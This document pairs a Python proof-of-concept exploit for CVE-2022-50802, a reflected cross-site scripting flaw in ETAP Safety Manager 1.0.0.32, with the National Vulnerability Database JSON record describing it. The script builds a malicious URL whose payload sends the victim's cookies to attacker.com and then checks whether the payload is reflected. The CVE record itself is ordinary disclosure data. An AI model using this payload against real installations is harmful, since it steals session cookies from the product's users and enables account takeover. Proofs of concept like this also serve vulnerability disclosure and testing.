CVE-2022-50802

import requests # CVE-2022-50802 PoC - ETAP Safety Manager XSS via 'action' parameter # Target: ETAP Safety Manager 1.0.0.32 # Vulnerability: Reflected XSS in 'action' GET parameter target_url = "http://target-host/ETAP-Safety-Manager/" # Malicious payload - steals cookies xss_payload = "<script>document.location='https://attacker.com/steal?c='+document.cookie</script>" # Construct the malicious URL malicious_url = f"{target_url}?action={requests.utils.quote(xss_payload)}" print(f"[*] Target: {target_url}") print(f"[*] Malicious URL: {malicious_url}") print(f"[*] Payload: {xss_payload}") # Send the request to verify vulnerability try: response = requests.get(malicious_url, timeout=10) if xss_payload in response.text: print("[+] VULNERABLE - XSS payload reflected in response") else: print("[-] Possibly not vulnerable or different endpoint") except Exception as e: print(f"[-] Error: {e}") # Note: For testing, replace 'target-host' with actual ETAP Safety Manager IP # The 'action' parameter value is reflected without sanitization

{"cve": {"id": "CVE-2022-50802", "sourceIdentifier": "[email protected]", "published": "2025-12-30T23:15:47.647", "lastModified": "2026-01-07T22:02:42.960", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ETAP Safety Manager 1.0.0.32 contains a cross-site scripting vulnerability in the 'action' GET parameter that allows unauthenticated attackers to inject malicious HTML and JavaScript. Attackers can craft specially formed requests to execute arbitrary scripts in victim browser sessions, potentially stealing credentials or performing unauthorized actions."}, {"lang": "es", "value": "ETAP Safety Manager 1.0.0.32 contiene una vulnerabilidad de cross-site scripting en el parámetro GET 'action' que permite a atacantes no autenticados inyectar HTML y JavaScript maliciosos. Los atacantes pueden elaborar solicitudes especialmente formadas para ejecutar scripts arbitrarios en las sesiones del navegador de la víctima, potencialmente robando credenciales o realizando acciones no autorizadas."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:etaplighting:etap_safety_manager:1.0.0.32:*:*:*:*:*:*:*", "matchCriteriaId": "37A054DD-4E7C-4591-8E6A-6882765EC694"}]}]}], "references": [{"url": "https://cxsecurity.com/issue/WLB-2022090031", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/235743", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://packetstormsecurity.com/files/168339/", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.etaplighting.com/", "source": "[email protected]", "tags": ["Product", "US Government Resource"]}, {"url": "https://www.vulncheck.com/advisories/etap-safety-manager-unauthenticated-reflected-cross-site-scripting-via-action-parameter", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5711.php", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://cxsecurity.com/issue/WLB-2022090031", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5711.php", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Third Party Advisory"]}]}}